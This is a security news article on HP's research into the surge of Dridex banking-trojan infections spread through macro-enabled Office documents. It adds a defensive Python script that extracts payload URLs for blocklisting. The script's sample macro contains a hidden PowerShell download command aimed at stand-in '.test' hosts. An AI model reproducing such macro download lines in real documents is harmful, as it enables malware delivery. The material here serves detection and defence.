Top Cybersecurity Tools

Dridex Malware Attacks on the Rise According to HP Threat Research Team

Ever since malicious coders first found ways to steal information from computers for their own gain, malware has grown into a serious menace to modern communications.

Dridex is gaining popularity.

Dridex is a malicious software program developed to infect computers and steal financial information, such as online banking credentials. It operates without the knowledge of the computer’s owner and silently transfers the stolen data to the attackers, who then use it to steal money from the victim.

HP’s Threat Research Team has found that Dridex infections have surged dramatically in recent months, with a 239 percent increase from the third quarter to the fourth quarter of 2020. Attacks have continued to climb in the new year: infections recorded in the first month of 2021 alone exceeded the total for the entire third quarter of 2020.

Tactics are constantly changing.

Dridex is an old piece of malware, first identified as a Trojan in 2012. The digital thieves behind it have nevertheless withstood repeated attempts by anti-malware vendors and security teams to stop it spreading. They have recently been found hosting the malware on hundreds of compromised websites, and with so many hosts it is extremely difficult to track down and block every URL.

Patrick Schläpfer, an HP Malware Analyst, recently published a blog post describing how Dridex is currently distributed:

“Dridex’s distributors frequently spread the malware through the use of infected Office documents that download the Trojan from a remote web server,” according to the company. “Interestingly, from the middle of 2020, some of the malicious documents have begun to include hundreds of URLs from which the virus can be downloaded. This strategy increases the loader’s resistance against takedown actions by hosting providers and domain registrars by several orders of magnitude. It also enhances the likelihood of the payload being successfully downloaded after it has been downloaded. Network security controls, such as web proxies, would have to block hundreds of URLs rather than just one to prevent malware from being downloaded.”

Because its techniques are constantly changing, Dridex is tough to fight effectively, and the sheer number of URLs makes it very hard to halt its spread completely.

HP’s Analysis

The HP Threat Research Team’s investigation shows that the developers are extremely active and use a variety of tactics in their attacks, many of them highly specific:

Six different methods are now in use for disguising the true URLs. While this makes it harder to tell which encoding method a given sample uses, it also shows that the developers have limited themselves to a fixed set of variants, which makes it easier for security researchers to decode them and build defences against the malware’s spread.

Each wave of infection uses a different URL-concealment mechanism from the wave before it. This has held throughout the second half of 2020, across samples taken from 30 different waves.

The large number of URLs hidden in the maldocs (malicious documents) used to download the malware shows how widespread its distribution is, and how many servers around the world host the Trojan.

What Causes Dridex to Spread

Dridex is distributed through several kinds of documents, notably Microsoft Word documents and Excel spreadsheets. The operators send out carefully crafted spam emails that entice users into downloading what appears to be a harmless spreadsheet or document.

Once the document has been downloaded and opened, the attack proceeds only if the embedded VBA or Excel 4.0 macro is enabled. The macro then builds a PowerShell command or a Windows API call that connects to one of the many payload URLs and downloads the malicious code onto the system. Once installed, the Trojan specifically targets financial data, which it copies and sends back to Dridex’s operators.

Because the malware is launched by the computer’s own user, and because many security products fail to detect it, this kind of attack is extremely difficult to stop. For the best results, businesses should consider investing in hardware-based security.

Hardware-enforced isolation separates any files and links that originate from an untrusted source, such as the Internet, from the rest of the system. The user can still open and edit the files, but they run isolated from the rest of the computer. If a file turns out to be malicious and attempts to download and run Dridex, it does so inside that isolated environment, where it cannot damage the host.

HP Threat Research is the HP team that researches cyber threats.

HP’s threat information is based on customer data collected through the HP Sure Click Enterprise service. The platform, built on hardware virtualization technology, uses micro-virtual machines to isolate and contain threats. Because the malware runs inside these isolated containers, it can execute and reveal its true behaviour without endangering the host. The resulting analysis gives researchers a complete picture of an attempted attack, including how the malware behaves, and that information can be used to develop security signatures that help protect networks from attackers.

HP has also released a free Python script that extracts all of the URLs from Dridex maldocs regardless of which of the six encoding techniques a sample uses. The extracted URLs can be used to block potential Dridex payload URLs and to identify indicators of compromise (IOCs).
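The following is an added example, not HP’s script and not code from the original page. It shows the defensive workflow described above on a small scale: fold common VBA string obfuscation back into plain literals, pull the payload URLs out of the macro text, and reduce them to a host blocklist a web proxy could consume. The obfuscation patterns it handles (string concatenation with `&` or `+`, `Chr()`/`ChrW()` calls, and `StrReverse()`) are assumed for illustration and are not the six Dridex encodings the page refers to; the macro text and the `.test` domains are constructed for the example.

```python
"""Recover hidden URLs from an obfuscated VBA macro and emit blocklist indicators.

Added example (not HP's tool). The obfuscation patterns below are assumptions
chosen for illustration, not the actual Dridex URL encodings.
"""
import re
from urllib.parse import urlparse

# Constructed sample macro text (not a real Dridex sample).
SAMPLE_MACRO = r'''
Sub AutoOpen()
    Dim u(2) As String
    u(0) = "ht" & "tp://" & Chr(101) & "xample-a.test/load.bin"
    u(1) = StrReverse("nib.daol/tset.b-elpmaxe//:sptth")
    u(2) = "https://" + "example-c.test" + "/p/" + Chr(100) + Chr(112)
    Shell "powershell -w hidden -c (New-Object Net.WebClient).DownloadFile(u(0), ...)"
End Sub
'''

URL_RE = re.compile(r'https?://[^\s"\'<>)]+', re.IGNORECASE)


def deobfuscate(text: str) -> str:
    """Fold assumed VBA string tricks into plain string literals.

    Runs until the text stops changing, so nested constructs such as
    StrReverse("a" & "b") are resolved as well.
    """
    previous = None
    while previous != text:
        previous = text
        # Chr(101) / ChrW(101) -> "e"
        text = re.sub(r'\bChrW?\((\d+)\)',
                      lambda m: '"%s"' % chr(int(m.group(1))), text)
        # "ht" & "tp"  or  "ht" + "tp"  -> "http"
        text = re.sub(r'"\s*[&+]\s*"', '', text)
        # StrReverse("cba") -> "abc"
        text = re.sub(r'\bStrReverse\("([^"]*)"\)',
                      lambda m: '"%s"' % m.group(1)[::-1], text)
    return text


def extract_payload_urls(macro_text: str) -> list:
    """Return every URL literal recoverable from the macro, in document order."""
    return URL_RE.findall(deobfuscate(macro_text))


def blocklist_hosts(urls: list) -> list:
    """Reduce a URL list to sorted, unique hostnames for a proxy blocklist."""
    hosts = {urlparse(u).hostname for u in urls if urlparse(u).hostname}
    return sorted(hosts)


if __name__ == "__main__":
    found = extract_payload_urls(SAMPLE_MACRO)
    print("payload URLs:")
    for url in found:
        print("  ", url)
    print("hosts to block:")
    for host in blocklist_hosts(found):
        print("  ", host)
```

Feeding the function the macro source dumped from a real document (for example, VBA extracted with olevba) would yield the full URL list for a sample; hosts rather than full URLs are emitted because the proxy rule has to hold even when the path changes between waves.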

If you want to learn more about Dridex malware and how to defend your PCs from the financial threat that it poses, you can read the most recent report by the HP Threat Research team, which can be found here.